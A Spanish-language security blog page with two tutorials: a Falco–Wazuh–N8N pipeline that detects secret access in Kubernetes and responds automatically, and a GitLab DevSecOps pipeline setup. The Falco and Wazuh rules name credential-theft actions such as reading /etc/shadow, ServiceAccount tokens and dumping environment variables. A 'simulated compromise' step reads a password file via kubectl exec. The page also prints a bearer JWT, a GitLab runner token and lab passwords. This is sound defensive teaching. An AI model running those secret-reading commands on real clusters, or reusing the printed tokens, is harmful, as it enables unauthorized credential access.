Santiago Fernandez | Ciberseguridad

Kubernetes Runtime Security. De una curiosidad a un flujo de Seguridad inteligente.

Santiago Fernandez — Mon, 01 Dec 2025 01:26:43 GMT

Introducción

Todos hemos vivido ese momento: alguien abre un pod en producción, ejecuta un printenv y revisa una variable sensible. A veces es por curiosidad, otras por necesidad técnica… pero ¿y si no fue un desarrollador? ¿y si fue una cuenta comprometida?

Aquí es donde Falco 🦅 entra en escena.

Vamos a crear un escenario simple pero poderoso:
Un desarrollador curioso inspecciona una variable de entorno en un contenedor de producción. Falco detecta el evento en tiempo real y lo envía a Wazuh, donde lo enriquecemos, clasificamos y correlacionamos. Desde ahí, disparamos acciones automáticas con N8N.

¿Qué acciones? Las que queramos:

🔄 Rotar credenciales en Vault
📦 Regenerar Pods afectados
📑 Extraer registros para análisis forense
🔔 Notificar por Slack o Teams

Lo interesante es que no perseguimos al developer: aprovechamos la señal para fortalecer la seguridad.

Falco supervisa el comportamiento en tiempo real dentro de Kubernetes. Wazuh examina el contexto y clasifica el evento. N8N coordina la respuesta automática. De una simple curiosidad, surge un flujo de seguridad inteligente.

Falco

Vamos a crear el archivo de configuración de falco falco-values-complete.yaml, para luego instalar con Helm.

falco:
  json_output: true
  json_include_output_property: true
  json_include_tags_property: true

  grpc:
    enabled: true
    bind_address: "0.0.0.0:5060"

  grpc_output:
    enabled: true

driver:
  kind: modern_ebpf

falcosidekick:
  enabled: true
  replicaCount: 2
  hostNetwork: true
  dnsPolicy: ClusterFirstWithHostNet

  config:
    syslog:
      host: "192.168.0.67"  # ← IP CORRECTA
      port: "514"
      protocol: "udp"
      format: "json"
      minimumpriority: "notice"

customRules:
  secrets-detection.yaml: |-
    - rule: Read Sensitive File Untrusted
      desc: Detect attempts to read sensitive system files
      condition: >
        open_read and
        container and
        fd.name in (/etc/shadow, /etc/sudoers, /etc/pam.conf)
      output: >
        Sensitive file opened for reading
        (file=%fd.name command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: WARNING
      tags: [filesystem, mitre_credential_access, T1555]

    - rule: Read Kubernetes Secret File
      desc: Detect read operations on Kubernetes secret files
      condition: >
        open_read and
        container and
        fd.name startswith "/etc/secrets/"
      output: >
        Kubernetes secret file accessed
        (file=%fd.name command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: WARNING
      tags: [kubernetes, secrets, T1552.007, mitre_credential_access]

    - rule: Read Application Secret Files
      desc: Detect unauthorized access to application secret files
      condition: >
        open_read and
        container and
        fd.name startswith "/tmp/app-config/"
      output: >
        Application secret file accessed
        (file=%fd.name command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: WARNING
      tags: [filesystem, application, mitre_credential_access, T1552, secrets]

    - rule: Environment Variables Dumped
      desc: Detect attempts to dump environment variables
      condition: >
        spawned_process and
        container and
        proc.name in (printenv, env)
      output: >
        Environment variables dumped
        (command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: NOTICE
      tags: [process, mitre_credential_access, T1552.007]

    - rule: Environment Variables Dumped in Production
      desc: Detect env dumps in production namespace
      condition: >
        spawned_process and
        container and
        k8s.ns.name = "production" and
        proc.name in (env, printenv)
      output: >
        Environment variables accessed in production
        (command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: WARNING
      tags: [kubernetes, secrets, production, T1552.007, mitre_credential_access]

    - rule: Read ServiceAccount Token
      desc: Detect reading of Kubernetes ServiceAccount token
      condition: >
        open_read and
        container and
        fd.name startswith "/var/run/secrets/kubernetes.io/serviceaccount/token"
      output: >
        ServiceAccount token accessed
        (file=%fd.name command=%proc.cmdline user=%user.name
        container=%container.name k8s_pod=%k8s.pod.name k8s_ns=%k8s.ns.name)
      priority: WARNING
      tags: [kubernetes, credentials, mitre_credential_access, T1552.007]

resources:
  requests:
    cpu: 100m
    memory: 512Mi
  limits:
    cpu: 1000m
    memory: 1024Mi

No te olvides de poner la dirección de tu Wazuh.

Ahora instalamos el Helm.

helm install falco falcosecurity/falco \
  --namespace falco \
  -f falco-values-complete.yaml

Wazuh

No me voy a poner a explicar el uso de Wazuh, ya lo he tocado en otros post’s. Pero si les voy a pegar lo mas importante de esta configuración.

Primero el decoder en /var/ossec/etc/decoders/falco-decoder.xml.

# /var/ossec/etc/decoders/falco-decoder.xml
<decoder name="falco">
  <prematch>Falcoprematch>
decoder>

Segundo las reglas en /var/ossec/etc/rules/falco-rules.xml.

<group name="falco,">

  
  <rule id="100600" level="0">
    <decoded_as>falco-jsondecoded_as>
    <description>Falco: Runtime security eventdescription>
  rule>

  
  <rule id="100603" level="8">
    <if_sid>100600if_sid>
    <match>"priority":"Warning"match>
    <description>Falco Warning Alertdescription>
    <group>falco,warning,group>
  rule>

  <rule id="100605" level="12">
    <if_sid>100600if_sid>
    <match>"priority":"Critical"match>
    <description>Falco Critical Alertdescription>
    <group>falco,critical,group>
  rule>

  
  <rule id="100610" level="15">
    <if_sid>100603,100605if_sid>
    <match>"k8s.ns.name":"production"match>
    <description>Falco CRITICAL: Alerta en namespace PRODUCTIONdescription>
    <group>falco,production,high_priority,group>
  rule>

  
  <rule id="100620" level="12">
    <if_sid>100600if_sid>
    <match>"fd.name":"/etc/secrets/match>
    <description>Falco: Acceso a secreto K8s montadodescription>
    <group>falco,credential_access,secrets,group>
    <mitre>
      <id>T1552.007id>
    mitre>
  rule>

  
  <rule id="100621" level="12">
    <if_sid>100600if_sid>
    <match>"fd.name":"/etc/shadow"match>
    <description>Falco: Lectura de /etc/shadowdescription>
    <group>falco,credential_access,group>
    <mitre>
      <id>T1552.001id>
    mitre>
  rule>

  
  <rule id="100625" level="15">
    <if_sid>100620if_sid>
    <match>"k8s.ns.name":"production"match>
    <description>Falco CRITICAL: Developer accediendo a secretos en PRODUCCIÓNdescription>
    <group>falco,production,credential_access,unauthorized_access,group>
    <mitre>
      <id>T1552.007id>
    mitre>
  rule>

  
  <rule id="100640" level="14">
    <if_sid>100600if_sid>
    <match>Kubernetes secret file accessedmatch>
    <description>Falco: Lectura de archivo de secreto K8s detectadadescription>
    <group>falco,kubernetes,secrets,credential_access,group>
    <mitre>
      <id>T1552.007id>
    mitre>
  rule>

  
  <rule id="100641" level="12">
    <if_sid>100600if_sid>
    <match>Environment variables accessed in productionmatch>
    <description>Falco: Variables de entorno accedidas en produccióndescription>
    <group>falco,kubernetes,production,credential_access,group>
    <mitre>
      <id>T1552.007id>
    mitre>
  rule>

  
  <rule id="100650" level="16">
    <if_sid>100640if_sid>
    <match>"k8s.ns.name":"production"match>
    <description>Falco CRITICAL: Archivo de secreto K8s accedido en PRODUCCIÓN - Pod: webappdescription>
    <group>falco,production,kubernetes,credential_access,critical,group>
    <mitre>
      <id>T1552.007id>
    mitre>
  rule>

group>

Aquí está la integración.

No olvides incluir el puerto UDP 514 en ossec.conf y esta porción:

  
    n8n-webhook
    server
    falco
    12

Incident and Response

Aquí dejo el script que realiza la magia detrás de escena, para el análisis y la llamada a cada webhook junto con su wrapper. Este Python /var/ossec/active-response/bin/parse-and-send.py.

#!/usr/bin/env python3
import sys
import json
import re
import subprocess
import os
import time
from datetime import datetime

# URLs de N8N
N8N_TRIAGE = "http://192.168.0.12:5678/webhook/falco-triage"
N8N_FORENSICS = "http://192.168.0.12:5678/webhook/falco-forensics"
N8N_CONTAINMENT = "http://192.168.0.12:5678/webhook/falco-containment"

# Directorio de evidencia
FORENSICS_DIR = "/var/ossec/logs/forensics"

# Ruta completa de kubectl (para forensics)
KUBECTL = "/usr/local/bin/kubectl"

try:
    input_data = sys.stdin.read().strip()

    # Extraer campos con regex
    alert_id_match = re.search(r'"id":"([^"]+)"', input_data)
    rule_id_match = re.search(r'"rule":\{[^}]*"id":"([^"]+)"', input_data)
    rule_level_match = re.search(r'"level":(\d+)', input_data)
    rule_desc_match = re.search(r'"description":"([^"]+)"', input_data)
    timestamp_match = re.search(r'"timestamp":"([^"]+)"', input_data)

    full_log_match = re.search(r'"full_log":"(.+?)","decoder"', input_data)
    full_log = full_log_match.group(1) if full_log_match else ""

    # Parsear Falco JSON
    falco_data = {}
    falco_match = re.search(r'Falco\[\d+\]:\s*(\{.+\})', full_log)
    if falco_match:
        falco_json_str = falco_match.group(1).replace('\\', '')
        try:
            falco_data = json.loads(falco_json_str)
        except:
            pass

    # Extraer MITRE
    mitre_ids = re.findall(r'"mitre":\{[^}]*"id":\[([^\]]+)\]', input_data)
    mitre_id = mitre_ids[0].replace('"', '').strip() if mitre_ids else 'N/A'

    rule_id = rule_id_match.group(1) if rule_id_match else 'N/A'
    rule_level = int(rule_level_match.group(1)) if rule_level_match else 0

    namespace = falco_data.get('output_fields', {}).get('k8s.ns.name', 'unknown')
    pod = falco_data.get('output_fields', {}).get('k8s.pod.name', 'unknown')

    # Payload común
    payload = {
        'alert_id': alert_id_match.group(1) if alert_id_match else 'N/A',
        'rule_id': rule_id,
        'rule_level': str(rule_level),
        'rule_description': rule_desc_match.group(1) if rule_desc_match else 'N/A',
        'timestamp': timestamp_match.group(1) if timestamp_match else '',
        'k8s_namespace': namespace,
        'k8s_pod': pod,
        'container_id': falco_data.get('output_fields', {}).get('container.id', 'unknown'),
        'command': falco_data.get('output_fields', {}).get('proc.cmdline', 'unknown'),
        'file_accessed': falco_data.get('output_fields', {}).get('fd.name', 'unknown'),
        'user': falco_data.get('output_fields', {}).get('user.name', 'root'),
        'falco_rule': falco_data.get('rule', 'N/A'),
        'falco_priority': falco_data.get('priority', 'N/A'),
        'mitre_id': mitre_id
    }

    print(f"Processing alert - Rule: {rule_id}, Level: {rule_level}, NS: {namespace}, Pod: {pod}")

    # ============================================================================
    # 1. TRIAGE - Siempre enviar
    # ============================================================================
    result = subprocess.run(
        ['curl', '-X', 'POST', N8N_TRIAGE,
         '-H', 'Content-Type: application/json',
         '-d', json.dumps(payload),
         '--max-time', '10'],
        capture_output=True, text=True
    )
    print(f"TRIAGE - Sent to Slack")
    time.sleep(2)

    # ============================================================================
    # 2. FORENSICS - Para alertas level >= 12
    # ============================================================================
    if rule_level >= 12 and namespace != 'unknown' and pod != 'unknown':
        print(f"FORENSICS - Collecting evidence for {namespace}/{pod}")

        os.makedirs(FORENSICS_DIR, exist_ok=True)
        timestamp_str = datetime.now().strftime('%Y%m%d_%H%M%S')
        evidence_file = f"{FORENSICS_DIR}/{namespace}_{pod}_{timestamp_str}.txt"

        with open(evidence_file, 'w') as f:
            f.write("=" * 80 + "\n")
            f.write("FORENSICS REPORT - FALCO SECURITY INCIDENT\n")
            f.write("=" * 80 + "\n\n")

            f.write(f"Alert ID: {payload['alert_id']}\n")
            f.write(f"Timestamp: {payload['timestamp']}\n")
            f.write(f"Rule: {rule_id} (Level {rule_level})\n")
            f.write(f"Description: {payload['rule_description']}\n")
            f.write(f"MITRE ATT&CK: {mitre_id}\n\n")

            f.write(f"Namespace: {namespace}\n")
            f.write(f"Pod: {pod}\n")
            f.write(f"Container ID: {payload['container_id']}\n")
            f.write(f"User: {payload['user']}\n\n")

            f.write(f"Suspicious Command: {payload['command']}\n")
            f.write(f"File Accessed: {payload['file_accessed']}\n")
            f.write(f"Falco Rule: {payload['falco_rule']}\n\n")

            f.write("=" * 80 + "\n")
            f.write("POD LOGS (last 100 lines)\n")
            f.write("=" * 80 + "\n\n")

            try:
                logs = subprocess.run(
                    [KUBECTL, 'logs', pod, '-n', namespace, '--tail=100'],
                    capture_output=True, text=True, timeout=15
                )
                f.write(logs.stdout if logs.returncode == 0 else f"Error: {logs.stderr}\n")
            except Exception as e:
                f.write(f"Error capturing logs: {e}\n")

            f.write("\n" + "=" * 80 + "\n")
            f.write("POD DESCRIPTION\n")
            f.write("=" * 80 + "\n\n")

            try:
                describe = subprocess.run(
                    [KUBECTL, 'describe', 'pod', pod, '-n', namespace],
                    capture_output=True, text=True, timeout=15
                )
                f.write(describe.stdout if describe.returncode == 0 else f"Error: {describe.stderr}\n")
            except Exception as e:
                f.write(f"Error describing pod: {e}\n")

            f.write("\n" + "=" * 80 + "\n")
            f.write("POD YAML MANIFEST\n")
            f.write("=" * 80 + "\n\n")

            try:
                yaml_out = subprocess.run(
                    [KUBECTL, 'get', 'pod', pod, '-n', namespace, '-o', 'yaml'],
                    capture_output=True, text=True, timeout=15
                )
                f.write(yaml_out.stdout if yaml_out.returncode == 0 else f"Error: {yaml_out.stderr}\n")
            except Exception as e:
                f.write(f"Error getting YAML: {e}\n")

            f.write("\n" + "=" * 80 + "\n")
            f.write("END OF REPORT\n")
            f.write("=" * 80 + "\n")

        subprocess.run(['gzip', '-f', evidence_file])
        evidence_file_gz = f"{evidence_file}.gz"

        print(f"FORENSICS - Evidence saved: {evidence_file_gz}")

        forensics_payload = payload.copy()
        forensics_payload['evidence_file'] = evidence_file_gz
        forensics_payload['evidence_collected'] = True

        result = subprocess.run(
            ['curl', '-X', 'POST', N8N_FORENSICS,
             '-H', 'Content-Type: application/json',
             '-d', json.dumps(forensics_payload),
             '--max-time', '10'],
            capture_output=True, text=True
        )
        print(f"FORENSICS - Notification sent to Slack")
        time.sleep(2)

    # ============================================================================
    # 3. CONTAINMENT - Delegado a N8N
    # ============================================================================
    CONTAINMENT_RULES = ['100625', '100650']
    is_production = namespace == 'production'
    is_vault_enabled = 'vault' in pod.lower()
    is_secret_access = (
        '/tmp/app-config/' in payload['file_accessed'] or
        '/etc/secrets/' in payload['file_accessed']
    )

    should_contain = (
        rule_id in CONTAINMENT_RULES or
        (is_production and is_vault_enabled and is_secret_access and rule_level >= 12)
    )

    if should_contain:
        print(f"CONTAINMENT - Delegating to N8N for {namespace}/{pod}")
        print(f"  - Production: {is_production}")
        print(f"  - Vault-enabled: {is_vault_enabled}")
        print(f"  - Secret access: {is_secret_access}")
        print(f"  - Rule: {rule_id}, Level: {rule_level}")

        # Enviar a N8N - él se encarga de todo
        containment_payload = payload.copy()
        containment_payload['action_required'] = 'ROTATE_AND_KILL'
        containment_payload['trigger_reason'] = f"Rule {rule_id} - Level {rule_level}"

        result = subprocess.run(
            ['curl', '-X', 'POST', N8N_CONTAINMENT,
             '-H', 'Content-Type: application/json',
             '-d', json.dumps(containment_payload),
             '--max-time', '10'],
            capture_output=True, text=True
        )
        print(f"CONTAINMENT - Delegated to N8N workflow")
        print(f"  N8N will: 1) Rotate secret in Vault, 2) Delete pod via K8s API")

    sys.exit(0)

except Exception as e:
    print(f"ERROR: {str(e)}")
    import traceback
    traceback.print_exc()
    sys.exit(1)

Y el Wrapper en /var/ossec/active-response/bin/n8n-webhook.sh.

#!/bin/bash

LOCAL=`dirname $0`
cd $LOCAL
PWD=`pwd`

read INPUT_JSON

mkdir -p /var/ossec/logs/active-response

echo "$(date '+%Y-%m-%d %H:%M:%S') - Processing alert" >> /var/ossec/logs/active-response/n8n-webhook.log

# Llamar al script Python que hace todo
RESULT=$(echo "$INPUT_JSON" | /var/ossec/active-response/bin/parse-and-send.py 2>&1)

echo "$RESULT" >> /var/ossec/logs/active-response/n8n-webhook.log
echo "---" >> /var/ossec/logs/active-response/n8n-webhook.log

exit 0

N8N

Voy a usar Kubectl para acceder.

kubectl port-forward -n automation svc/n8n 5678:5678 --address=0.0.0.0

Vamos a importar el flujo de trabajo para obtener estos 3 caminos. El Triage nos avisa del compromiso, Forensic obtiene los registros para la investigación y Containment se encarga de rotar el secreto en Vault, eliminar el Pod y darnos el estado. Te dejo el workflow para que importes.

Para que N8N pueda comunicarse con Kubernetes, crearemos una cuenta de servicio que solo tenga permisos para eliminar Pods, de esta manera obtendremos el Bearer necesario para usar.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: n8n-incident-response
  namespace: automation
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: n8n-incident-response
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "delete"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: n8n-incident-response
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: n8n-incident-response
subjects:
- kind: ServiceAccount
  name: n8n-incident-response
  namespace: automation
---
apiVersion: v1
kind: Secret
metadata:
  name: n8n-incident-response-token
  namespace: automation
  annotations:
    kubernetes.io/service-account.name: n8n-incident-response
type: kubernetes.io/service-account-token

Te dejo los comandos para poder listar el token.

TOKEN=$(kubectl -n automation get secret n8n-incident-response-token -o jsonpath='{.data.token}' | base64 --decode)
kubectl -n automation get secret n8n-incident-response-token -o jsonpath='{.data.ca\.crt}' | base64 --decode > ca.crt
APISERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}')

echo Bearer $TOKEN
Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IjFiaG1pd19KOHJJYnZkbWlhSkptdWl3dHNXZEFmMW9WeWZIRWp1NS0xVW8ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJhdXRvbWF0aW9uIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6Im44bi1pbmNpZGVudC1yZXNwb25zZS10b2tlbiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJuOG4taW5jaWRlbnQtcmVzcG9uc2UiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiI0MzJlYTQ2NC0yMmIwLTQ3ZjktYTE2NS01ZGY3YTgxYzM2OTEiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXV0b21hdGlvbjpuOG4taW5jaWRlbnQtcmVzcG9uc2UifQ.gMa6wGi0SpTrfRYLD5DoOUhH3I19U2v0_brgQaWGtYoOBJyQaavBQOijV4yad6My2theSQVoRVHDseO_pYKBLuc3MhggOxaN2dOLGe3oB3kKQ3TGeTxFlIWYV9tBH7_5SBLoASfuet4frimfkL03sgb5lYx93IdSgMDewQGA_RVVH0McVOwignR43KHARYqwgraqwAjPaD9hdEf5Y3i7v0hPhgln-gBc42B7q3lYCjXyjFCtvictPJ2813AhMNoKy2aLVACjsc9UDfZy1e4yV9ZQQ3QCQyfjPTLq2XXW_ob1sJGl2jmmcu73i23ZXuaVCgi-5zm5gKGlh0bdchWP3A

Creamos la credencial para el Kubernetes HTTP Request Delete Pod.

Tienes que añadir el token para el bot de Slack también.

Vault

Vamos a instalar Vault en el namespace automation.

# Agregar repo de Vault (si no lo tenés)
helm repo add hashicorp https://helm.releases.hashicorp.com
helm repo update

# Instalar Vault en modo DEV (para POC)
cat > vault-values.yaml << 'EOF'
server:
  dev:
    enabled: true
    devRootToken: "root"

  standalone:
    enabled: true

  service:
    type: NodePort
    nodePort: 30200

  dataStorage:
    enabled: false

ui:
  enabled: true
  serviceType: NodePort

injector:
  enabled: false
EOF

helm install vault hashicorp/vault \
  -f vault-values.yaml \
  -n automation --create-namespace

# Esperar
kubectl wait --for=condition=ready pod -l app.kubernetes.io/name=vault -n automation --timeout=300s

# Verificar
kubectl get pod -n automation -l app.kubernetes.io/name=vault

Ahora generamos el secreto, para que sea consumido.

# Port forward para acceder a Vault UI
kubectl port-forward -n automation svc/vault 8200:8200 &

# Acceder a Vault
export VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_TOKEN='root'

# O desde el pod
kubectl exec -it vault-0 -n automation -- vault login root

# Habilitar KV v2 secrets engine
kubectl exec -it vault-0 -n automation -- vault secrets enable -path=secret kv-v2

# Crear secreto inicial para producción
kubectl exec -it vault-0 -n automation -- vault kv put secret/production/db-credentials \
  username=admin \
  password=InitialSecretP@ssw0rd123 \
  api_key=sk-prod-initial-key \
  version=1

Aplicación

Now it's time for the application to read the password from Vault. The webapp-vault pod will be created in the production namespace. Remember that many of our rules use the namespace as a condition.

apiVersion: v1
kind: ConfigMap
metadata:
  name: vault-reader-script
  namespace: production
data:
  read-secrets.sh: |
    #!/bin/sh

    VAULT_ADDR="http://vault.automation.svc.cluster.local:8200"
    VAULT_TOKEN="root"
    SECRET_PATH="secret/data/production/db-credentials"

    echo "============================================"
    echo "🔐 VAULT-ENABLED APPLICATION"
    echo "============================================"
    echo "Vault: $VAULT_ADDR"
    echo "Pod: $(hostname)"
    echo "Timestamp: $(date)"
    echo ""

    echo "📡 Connecting to Vault..."
    SECRET_JSON=$(wget -q -O - \
      --header "X-Vault-Token: $VAULT_TOKEN" \
      "$VAULT_ADDR/v1/$SECRET_PATH")

    if [ $? -ne 0 ]; then
      echo "❌ Failed to connect to Vault"
      sleep 30
      exit 1
    fi

    DB_USERNAME=$(echo "$SECRET_JSON" | sed -n 's/.*"username":"\([^"]*\)".*/\1/p')
    DB_PASSWORD=$(echo "$SECRET_JSON" | sed -n 's/.*"password":"\([^"]*\)".*/\1/p')
    API_KEY=$(echo "$SECRET_JSON" | sed -n 's/.*"api_key":"\([^"]*\)".*/\1/p')
    SECRET_VERSION=$(echo "$SECRET_JSON" | sed -n 's/.*"version":\([0-9]*\).*/\1/p')

    if [ -z "$DB_PASSWORD" ]; then
      echo "❌ Failed to parse secrets"
      exit 1
    fi

    echo "✅ Secrets loaded successfully!"
    echo ""
    echo "📊 Configuration:"
    echo "  Username: $DB_USERNAME"
    echo "  Password: ${DB_PASSWORD:0:4}***${DB_PASSWORD: -3}"
    echo "  API Key: ${API_KEY:0:12}***"
    echo "  Vault Version: ${SECRET_VERSION}"
    echo ""

    mkdir -p /tmp/app-config
    echo "$DB_USERNAME" > /tmp/app-config/username
    echo "$DB_PASSWORD" > /tmp/app-config/password
    echo "$API_KEY" > /tmp/app-config/api-key
    echo "${SECRET_VERSION}" > /tmp/app-config/secret-version
    chmod 600 /tmp/app-config/*

    echo "✅ Config files created at /tmp/app-config/"
    ls -la /tmp/app-config/
    echo ""
    echo "============================================"
    echo "🚀 APPLICATION RUNNING"
    echo "============================================"
    echo "Using Vault secret version: ${SECRET_VERSION}"
    echo ""

    COUNTER=0
    while true; do
      COUNTER=$((COUNTER + 1))
      echo "[$(date '+%H:%M:%S')] Heartbeat #$COUNTER - Vault version ${SECRET_VERSION}"
      sleep 30
    done
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-vault
  namespace: production
  labels:
    app: webapp-vault
spec:
  replicas: 1
  selector:
    matchLabels:
      app: webapp-vault
  template:
    metadata:
      labels:
        app: webapp-vault
        env: production
        vault-enabled: "true"
    spec:
      containers:
      - name: webapp
        image: busybox
        command: ["/bin/sh", "/scripts/read-secrets.sh"]
        volumeMounts:
        - name: scripts
          mountPath: /scripts
      volumes:
      - name: scripts
        configMap:
          name: vault-reader-script
          defaultMode: 0755

Simulación de Compromiso

Ahora la parte que el atacante o el desarrollador curioso quiere leer una variable de entorno.

# 1. Obtener nombre del pod
POD=$(kubectl get pod -n production -l app=webapp-vault -o jsonpath='{.items[0].metadata.name}')

echo "Pod actual: $POD"

# 2. Simular compromiso
kubectl exec $POD -n production -- cat /tmp/app-config/password

Uala!

Mientas tanto en Wazuh.

Comandos Utiles

# Para ver los logs del Python
tail -f /var/ossec/logs/active-response/n8n-webhook.log
# Ver Alertas de Wazuh
tail -f /var/ossec/logs/alerts/alerts.log | grep -i "falco"

Referencias

https://blog.santiagoagustinfernandez.com/runtime-security-con-falco#heading-instalacion-de-falco-via-helm

Superpipeline DevSecOps con IA

Santiago Fernandez — Fri, 14 Nov 2025 23:32:33 GMT

En el mundo del desarrollo moderno, la seguridad no puede ser una idea tardía. Los equipos enfrentan el desafío constante de mantener la velocidad de desarrollo sin comprometer la seguridad de sus aplicaciones. Este artículo documenta la construcción de un pipeline DevSecOps completo que integra seguridad automatizada, análisis con IA y visibilidad centralizada.

El Desafío

Como profesional de ciberseguridad, me enfrenté a varios problemas comunes en equipos de desarrollo:

Secretos hardcodeados que terminan en producción
Vulnerabilidades en dependencias que pasan desapercibidas
Código inseguro que se detecta demasiado tarde
Falta de visibilidad sobre el estado de seguridad real
Errores de pipeline sin contexto ni soluciones claras

La pregunta era: ¿Cómo podemos hacer que la seguridad sea automática, informativa y no obstructiva La Solución: Un Pipeline DevSecOps con IA

Construí un pipeline completo que combina:

GitLab CI/CD para orquestación
4 herramientas de seguridad (Bandit, Safety, GitLeaks, Trivy)
DefectDojo para gestión de vulnerabilidades
n8n para automatización inteligente
Ollama (Mistral 7B) para análisis de errores con IA
Slack para notificaciones contextuales
Kubernetes (k3s) para deployment
Cloudflare Tunnel para exposición segura

Vamos a descargar el repositorio que tengo los archivos ahi. Primero echamos a correr nuestro docker compose, para levantar el stack.

❯ sudo git clone https://github.com/safernandez666/devsecopsia.git
Clonando en 'devsecopsia'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 29 (delta 6), reused 27 (delta 4), pack-reused 0 (from 0)
Recibiendo objetos: 100% (29/29), 16.45 KiB | 1.10 MiB/s, listo.
Resolviendo deltas: 100% (6/6), listo.

Vamos a echarlo a correr.

docker compose up

Kubernetes

Como pueden ver, tenemos k3s como nodo de Kubernetes. Se generará una carpeta llamada k3s-kubeconfig. Lo primero que haremos es configurarla para poder gestionarla mediante kubectl.

export KUBECONFIG=/Users/santiago/Proyects/devsecopsia/k3s-kubeconfig/kubeconfig.yaml

Nuestro clúster está en funcionamiento. Vamos a desplegar manualmente nuestra aplicación usando kubectl apply -f k8s/.

¡Listo! Nuestra aplicación está funcionando.

💡

Es importante que crees tu tunnel de Cloudflare con tus datos. Este es un dominio que uso de prueba, para mis PoC.

Sigamos con los demás componentes.

Gitlab

Vamos a iniciar sesión en http://localhost:8000 con el usuario: root y la contraseña: changeme123.

Outbound

Una vez dentro, configuraremos algunos elementos específicos, como el Outbound para habilitar las integraciones.

Proyecto

Ahora vamos a crear el proyecto y subir el código.

# Eliminamos .git
sudo rm -R .git

git init --initial-branch=master
git remote add origin http://localhost:8000/root/python-application.git
git add .
git commit -m "Initial commit"
git push --set-upstream origin master

Listo! Tenemos nuestro proyecto en Gitlab.

Webook

Una vez generado el proyecto vamos a crear el Webhook que hablara con N8N cada vez que hay un evento en el pipeline. Tenemos que tildar Pipeline events para la PoC vamos a deshabilitar el SSL y la ruta sera del Webhook sera http://n8n:5678/webhook/gitlab-ai.

Registrar Runner

Vamos a registrar el runner que se encargará de ejecutar nuestro proyecto. Para ello nos vamos a meter dentro del docker gitlab-runner y ejecutar algunos comandos. Previo a eso necesitamos un token. Ingresamos al docker con:

docker exec -it gitlab-runner sh

Ahí aplicamos el comando que nos da Gitlab.

Vamos a editar el config.toml de runner.

docker exec -it gitlab-runner vi /etc/gitlab-runner/config.toml

Deberia quedar asi:

concurrent = 1
check_interval = 0
shutdown_timeout = 0

[session_server]
  session_timeout = 1800

[[runners]]
  name = "docker-desktop"
  url = "http://localhost:8000"
  id = 1
  token = "glrt-GWHqJu72JQo3xR1-1okEwW86MQp0OjEKdToxCw.01.1215lwx2d"
  token_obtained_at = 2025-11-14T21:15:44Z
  token_expires_at = 0001-01-01T00:00:00Z
  executor = "docker"
  [runners.cache]
    MaxUploadedArchiveSize = 0
    [runners.cache.s3]
    [runners.cache.gcs]
    [runners.cache.azure]
  [runners.docker]
    tls_verify = false
    image = "alpine-latest"
    privileged = false
    volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"]
    disable_entrypoint_overwrite = false
    oom_kill_disable = false
    disable_cache = false
    shm_size = 0
    network_mode = "host"
    network_mtu = 0

Listo, solo queda reiniciarlo con un docker restart gitlab-runner. Tenemos el runner en linea y listo para funcionar.

💡

Es importante crear un repositorio en Docker Hub, que es donde guardamos la imagen. Agregar las variables DOCKERHUB_USERNAME & DOCKERHUB_PASSWORD en el CI/CD. Mas adelante deberas agregar el variable de Defect Dojo y la configuracion de Kubernetes.

Más adelante, deberás agregar la variable de Defect Dojo y la configuración de Kubernetes. Aquí tienes una imagen de ejemplo.

Defect Dojo

Vamos a reunir todos nuestros hallazgos en esta plataforma. Una vez que esté en funcionamiento, la configuraremos para que esté operativa y podamos extraer la API Key que necesitamos para nuestro CI en Gitlab.

# Inicializar la base de datos de DefectDojo
docker exec -it defectdojo-uwsgi ./manage.py migrate

# Crear el superusuario (admin/admin123)
docker exec -it defectdojo-uwsgi ./manage.py createsuperuser --noinput --username admin --email admin@defectdojo.local

# Cambiar la password del admin
docker exec -it defectdojo-uwsgi python manage.py shell << EOF
from django.contrib.auth import get_user_model
User = get_user_model()
user = User.objects.get(username='admin')
user.set_password('admin123')
user.save()
EOF

# Reiniciar los servicios
docker restart defectdojo-uwsgi defectdojo-nginx

Generamos la API Key una vez que hicimos el Sign In.

La copiamos y luego la agregamos como variable en CI/CD bajo el nombre de DEFECTDOJO_API_KEY.

💡

Es importante crear el Enviroment Development. Para que pueda subir los hallazgos el CI.

N8N

Importamos el proyecto y rellenamos lo que nos falta. Por un lado es el Token del Bot de Slack, en internet vas a encontrar como sacarlo, y por el otro un PRIVATE-TOKEN.

Pipeline

Vamos a correr el pipeline. Hacemos un cambio y hacemos el push.

Slack nos avisa, que tenemos que hacer. Le damos play al deploy-k3s. Listo, ya esta corriendo nuestro deployment.

Vemos como se despliega.

El mensaje de Slack donde se ejecuto el pipeline numero #96.

Ya estamos productivos.

Generación de Errores

